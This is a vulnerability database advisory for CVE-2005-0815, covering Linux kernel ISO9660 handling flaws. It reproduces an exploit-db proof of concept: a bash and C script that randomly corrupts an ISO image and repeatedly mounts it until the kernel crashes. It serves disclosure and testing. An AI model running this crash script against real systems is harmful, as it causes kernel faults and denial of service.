Multiple Vulnerabilities in Linux ISO9660 File Handling

Vulnerability ID 1108540 Vulnerability type Unknown
Published 2005-03-17 Updated 2007-03-01
CVE ID CVE-2005-0815 CNNVD-ID CNNVD-200505-598
Platform Linux CVSS score 6.4
|Vulnerability sources
https://www.exploit-db.com/exploits/25234
https://www.securityfocus.com/bid/12837
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-598
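|Vulnerability details
Linux is a very widely used open-source operating system. The ISO9660 filesystem handling code in Linux 2.6.11 and earlier contains several vulnerabilities, ranging from DoS to exploitable memory corruption. They may be triggered when a specially crafted filesystem is mounted or when its directories are inspected.
|Exploit (EXP)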
# source: http://www.securityfocus.com/bid/12837/info
#
# The Linux kernel is reported prone to multiple vulnerabilities that occur because of "range-checking flaws" present in the ISO9660 handling routines.
#
# An attacker may exploit these issues to trigger kernel-based memory corruption. Ultimately, the attacker may be able to execute arbitrary malicious code with ring-zero privileges.
#
# These vulnerabilities are reported to be present in the ISO9660 filesystem handler including Rock Ridge and Joliet extensions for the Linux kernel up to and including version 2.6.11.
#


#!/bin/bash

cd /tmp || exit 1

echo '[*] Compiling mangler...'

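cat >mangle.c <<_EOF_
#include <stdlib.h>
#include <time.h>
#include <unistd.h>

char buf[10240];

/* Copy stdin to stdout, overwriting up to ~5% of each block with random bytes. */
int main(void) {
  int i,x;
  srand(time(0) ^ getpid());
  while ( (i = read(0,buf,sizeof(buf))) > 0) {
    /* i/20 is 0 for reads shorter than 20 bytes; avoid dividing by zero */
    x = (i >= 20) ? rand() % (i/20) : 0;
    while (x--) buf[rand() % i] = rand();
    write(1,buf,i);
  }
  return 0;
}
_EOF_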

gcc -O3 mangle.c -o mangle || exit 1
rm -f mangle.c

echo '[*] Preparing ISO master (feel free to alter this code)...'

mkdir cd_dir || exit 1
cd cd_dir

CNT=0
while [ "$CNT" -lt "200" ]; do
  mkdir A; cd A
  CNT=$((CNT+1))
done

cd /tmp/cd_dir

A=`perl -e '{print "A"x255}' 2>/dev/null`
CNT=0
while [ "$CNT" -lt "3" ]; do
  mkdir "$A"; cd "$A"
  CNT=$((CNT+1))
done

cd /tmp

echo '[*] Creating image (alter filesystem or parameters as needed)...'

mkisofs -U -R -J -o cd.iso cd_dir 2>/dev/null || exit 1
rm -rf cd_dir

echo '[*] STRESS TEST PHASE...'

while :; do
  DIR="/tmp/cdtest-$$-$RANDOM"
  mkdir "$DIR"
  dmesg -c 2>/dev/null
  cat cd.iso | ./mangle >cd_mod.iso
  mount -t iso9660 -o loop,ro /tmp/cd_mod.iso "$DIR" 2>/dev/null
  # ls -lAR "$DIR" - Uncomment if you like when it HURTS...
  umount "$DIR" 2>/dev/null
  rm -rf "$DIR" 2>/dev/null
  FAULT=`dmesg | grep -Ei 'oops|unable to handle'`
  test "$FAULT" = "" || break
done

dmesg | tail -30

echo '[+] Something found (/tmp/cd_mod.iso)...'

rm -f cd.iso mangle
exit 0
|Affected products
Ubuntu Ubuntu Linux 4.1 ppc Ubuntu Ubuntu Linux 4.1 ia64 Ubuntu Ubuntu Linux 4.1 ia32 SGI ProPack 3.0 SP6 SGI ProPack 3.0 SP5 SGI ProPack 3.0 SP4 SGI ProPac
|References

Source: FEDORA
Name: FLSA:152532
Link: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=152532
Source: XF
Name: kernel-iso9660-filesystem(19741)
Link: http://xforce.iss.net/xforce/xfdb/19741
Source: BID
Name: 12837
Link: http://www.securityfocus.com/bid/12837
Source: BUGTRAQ
Name: 20050317 Linux ISO9660 handling flaws
Link: http://www.securityfocus.com/archive/1/393590
Source: kernel.org
Link: http://kernel.org/pub/linux/kernel/v2.6/testing/ChangeLog-2.6.12-rc1
Source: REDHAT
Name: RHSA-2006:0191
Link: http://www.redhat.com/support/errata/RHSA-2006-0191.html
Source: REDHAT
Name: RHSA-2006:0190
Link: http://www.redhat.com/support/errata/RHSA-2006-0190.html
Source: REDHAT
Name: RHSA-2005:663
Link: http://www.redhat.com/support/errata/RHSA-2005-663.html
Source: REDHAT
Name: RHSA-2005:366
Link: http://www.redhat.com/support/errata/RHSA-2005-366.html
Source: MANDRIVA
Name: MDKSA-2006:072
Link: http://www.mandriva.com/security/advisories?name=MDKSA-2006:072
Source: VUPEN
Name: ADV-2005-1878
Link: http://www.frsirt.com/english/advisories/2005/1878
Source: SECUNIA
Name: 18684
Link: http://secunia.com/advisories/18684